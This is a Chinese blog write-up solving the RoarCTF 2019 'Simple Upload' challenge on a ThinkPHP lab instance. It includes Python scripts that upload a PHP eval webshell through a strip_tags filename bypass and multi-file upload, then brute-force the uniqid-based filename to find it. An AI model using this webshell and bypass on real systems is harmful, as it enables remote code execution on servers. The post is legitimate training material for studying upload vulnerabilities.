[RoarCTF 2019]Simple Upload

最新推荐文章于 2024-09-10 13:45:00 发布
最新推荐文章于 2024-09-10 13:45:00 发布
阅读量198 收藏 3
点赞数 5
文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2302_79839194/article/details/142071066
版权

[RoarCTF 2019]Simple Upload

知识点:
  • tp默认上传目录: index.php/home/index/upload
  • tp支持多个文件上传
  • tp上传默认命名方式受时间控制uniqid()函数
  • 通过脚本发送上传文件的请求
题解:

tp文件上传时的文件名的核心处理

        foreach ($files as $key => $file) {
            $file['name']  = strip_tags($file['name']);
            if(!isset($file['key']))   $file['key']    =   $key;
            /* 通过扩展获取文件类型,可解决FLASH上传$FILES数组返回文件类型错误的问题 */
            if(isset($finfo)){
                $file['type']   =   finfo_file ( $finfo ,  $file['tmp_name'] );
            }

strip_tags():去除PHP标签和HTML标签

import  requests

url = "http://4835f395-9d0d-4192-a437-dc3f6105e9ca.node5.buuoj.cn:81/index.php/home/index/upload"

files={'file':('1.<>php',"<?php eval($_GET['cmd'])?>")}
r=requests.post(url=url,files=files)
print(r.text)

上传txt文件,php木马,txt文件,通过两个txt文件返回的文件名时间区间,爆破得到php木马文件的文件名

# import requests

# url = 'http://8cb4d947-ebbf-4017-8123-0b42190d8ba0.node5.buuoj.cn:81/index.php/Home/index/upload'

# file1 = {'file':open("E:\\OneDrive\\桌面\\1.txt",'r')}
# file2 = {'file[]':open("E:\\OneDrive\\桌面\\1.php",'r')}#upload()不传参时即是批量上传所以用[]

# r = requests.post(url,files = file1)
# print(r.text)

# r = requests.post(url,files = file2)
# print(r.text)

# r = requests.post(url, files = file1)
# print(r.text)

import requests
str='0123456789abcdef'
for i in str:
    for j in str:
        for k in str:
            for o in str:
                for p in str:
                    for q in str:
                        url = "http://8cb4d947-ebbf-4017-8123-0b42190d8ba0.node5.buuoj.cn:81/Public/Uploads/2024-09-09/66dec1a"+i+j+k+o+p+q+".php"
                        r = requests.get(url)
                        print(url)
                        if r.status_code == 200:
                            print(url)
                            break
参考资料:

wp1

wp2

Liqd
关注
  • 5
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
WEB漏洞攻防 - 文件上传漏洞 - CTF比赛类应用场景 - [RoarCTF 2019]Simple Upload
易编橙 · 终身成长社群,相遇已是上上签!
09-03 706
思考:在实际应用场景中,常规类的文件上传、CMS类的文件上传、编辑器的上传或者CTF比赛中的文件上传应用场景都有不同的差异;总结下来就是,文件上传不管是发现还是利用上都会根据产生层面而不同,常规类无资料的情况下采用常规思路测试,有资料的情况下直接参考资料进行即可。
[RoarCTF 2019]Simple Upload 记录
SopRomeo的博客
06-01 1158
说明 本篇为本人记录,并不是题解 下面这篇文章讲的很详细了 thinkphp 默认上传路径是/home/index/upload 为什么能绕过: 参考文献 这是用thinkphp框架写的 他调用了uplaod()这个方法 搜了搜 thinkphp文件上传漏洞 emmm,果然还得从开发搞起 由此批量上传文件 import requests '''方法一''' url = 'http://598b202c-5c60-4a06-b5a1-83ef646f7a82.node3.buuoj.cn/index.
RoarCTF2019部分Writeup
Sea_Sand息禅
11-29 860
Easy Calc 页面源码线索中得到calc.php <?php error_reporting(0); if(!isset($_GET['num'])){ show_source(__FILE__); }else{ $str = $_GET['num']; $blacklist = [' ', '\t', '\r', '\n','\'', '"'...
【文件上传】buu_[RoarCTF2019]SimpleUpload
serendipity1130的博客
08-28 379
考点:Thinkphp错误使用Upload类导致getshell 1.基本常识:thinkphp默认上传路径是/home/index/upload 2.$upload->allowExts并不是Think\Upload类的正确用法,所以allowexts后缀名限制是无效的。熟悉thinkphp的应该知道,upload()函数不传参时为多文件上传,整个$_FILES数组的文件都会上传保存。 3.题目中只限制了$_FILES[file]的上传后缀,也只给出$_FILES[file]上传后的路径.
RoarCTFweb-simple upload
weixin_44377940的博客
10-25 724
前一段时间的嘶吼CTF做的我自闭了,正好现在wp出来了,学长也搞了环境,顺手白嫖一下,试着按照wp做了一遍,学习了一下新知识。 首先,题目提示我们这是文件上传,源码也告诉了我们,但我试了一下upload.php等发现没有文件上传的页面,估计是要自己写脚本上传文件。再看看源码: ```php <?php namespace Home\Controller; useThink\Control...
WEB漏洞攻防 - 文件上传漏洞 - CTF比赛类应用场景 - [RoarCTF 2024]Simple Upload
2401_84009317的博客
04-21 805
现在我们去搜索 “ThinkPHP3.2版本” 开发手册,找到 URL 模块的相关文档,了解 “ThinkPHP3.2版本” 如何通通过 URL 对应的代码关系请求到访问的文件从 “ThinkPHP3.2版本” 开发手册中我们了解到 “PATHINFO模式” 是系统的默认 URL 模式,提供了最好的 SEO 支持,系统内部已经做了环境的兼容处理,所以能够支持大多数的主机环境。PATHINFO地址的前三个参数分别表示模块/控制器/操作。示例:参考上面的 URL 链接模块 --> home控制器 --
复现——RoarCTF-Web-simple_upload
Ch_an_ger的博客
10-25 741
题目是由Think PHP写的,看得出来应该是一个文件上传,同时也对上传的文件后缀做了过滤 文件上传中upload()函数在不传参的时候是以多文件形式上传的,加上只过滤了后缀名,而且还有一点是think PHP上传的文件是以递增式命名方式保存的,所以可以尝试多文件上传来绕过过滤,即先上传一个正常文件再上传一个木马文件,然后再上传一个正常文件,然后根据第一和第三个正常文件的文件名之间的差异,爆破出...
RoarCTF_Web_Writeup
Lethe's Blog
10-24 1102
周末有点事,BUUCTF上复现一下… easy_calc 这一题的界面和国赛的lova_math一题一样,应该是从那题改的。 源码中提示了这题加了waf,我们访问calc.php,看到源码如下 num传入表达式,然后用eval()计算并输出,因为加了waf所以num中如果有字母,会直接返回403,所以第一步就是绕过它。 这里可以利用HTTP请求走私来绕过,关于该漏洞可参考这篇文章:协议层的攻击...
simple-upload
04-01
"simple-upload"是一个针对Web开发的模块,主要功能是实现多图片上传。这个工具的目的是为了简化图片上传的处理流程,使其能够无缝地集成到各种Web开发框架中。"upload"标签表明了这个项目的核心特性,即文件上传,...
Simple Upload 汉化版
03-24
"Simple Upload 汉化版"是一个针对PHP开发的简单文件上传系统,它允许用户设置上传文件的大小限制和类型,以确保网站的安全性和资源管理的有效性。在本文中,我们将深入探讨PHP文件上传的基本原理,汉化版的实现细节...
Simple Data Upload-开源
05-12
SDU(简单数据上传)允许在MySQL数据库之间传输数据。 是实用程序mysqldump和客户端mysql的前端。
Simple Upload v 2.0 中文版
05-17
内容索引:PHP源码,上传下载,PHP上传文件 Simple Upload v 2.0 中文版,它是一个基本的PHP上传文件的模型,只有一个文件,可以设置上传类型、上传大小以及MIME类型、设置是否允许删除上传的文件,自动创建上传文件夹...
入门网络安全工程师要学习哪些内容
最新发布
白帽子佳奇的博客
09-10 1192
大家都知道网络安全行业很火,这个行业因为国家政策趋势正在大力发展,大有可为!但很多人对还是不了解,不知道需要学什么?知了堂小编总结出以下要点。是一个概称,学习的东西很多,具体学什么看自己以后的职业定位。如果你以后想成为安全产品工程师,学的内容侧重点就和不一样,如果你想成为安全开发工程师,学的侧重点就和安全不一样。学的东西很泛,但选定方向就简单了。大致的学习流程总结就是:网络基础、操作系统、中间件、数据库。其中电脑基础:像系统Windows基础和Linux基础、HTML基础、代码JS基础等。
【网络安全】空字节绕过:URL回调+XSS+SQL绕WAF
等风来
09-07 361
经过进一步测试,我发现WAF在解析HTTP请求时,如果发现恶意查询,会导致服务器挂起。如果我连续提交3个请求且服务器挂起,它就会阻止我的IP地址。
Web安全之SQL注入:如何预防及解决
J老熊
09-07 1345
SQL注入是一种通过在用户输入中嵌入恶意SQL代码的攻击方式。攻击者可以利用漏洞在未经授权的情况下访问数据库,执行原本不被允许的操作。例如,攻击者可以绕过身份验证、检索敏感信息,甚至删除数据。SQL注入是Web应用程序中最常见且最危险的安全漏洞之一,尤其是在涉及数据库操作的场景下,如电商交易系统。通过使用、严格的输入验证、最小权限原则以及使用ORM框架等方法,我们可以有效防止SQL注入攻击。开发人员需要养成良好的编码习惯,始终考虑潜在的安全问题,确保应用程序的安全性。
如何启动网络安全计划:首先要做的事情
网络研究观
09-07 935
保护数据不是一次性的活动,而是一个持续的适应和改进过程。
【网络安全】服务基础第二阶段——第三节:Linux系统管理基础----Linux用户与组管理
goldfish8848的博客
09-07 729
SUID、SGID 和 Sticky Bit 都在Linux提权中扮演了重要⻆⾊。
Amazon Simple DB开发指南
"Amazon Simple DB Guide 是亚马逊云平台(Amazon Web Services, AWS)中关于Amazon SimpleDB的一款开发者指南,主要针对API版本2009-04-15。该指南详细介绍了如何在AWS云平台上进行开发工作,尤其适用于那些希望...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值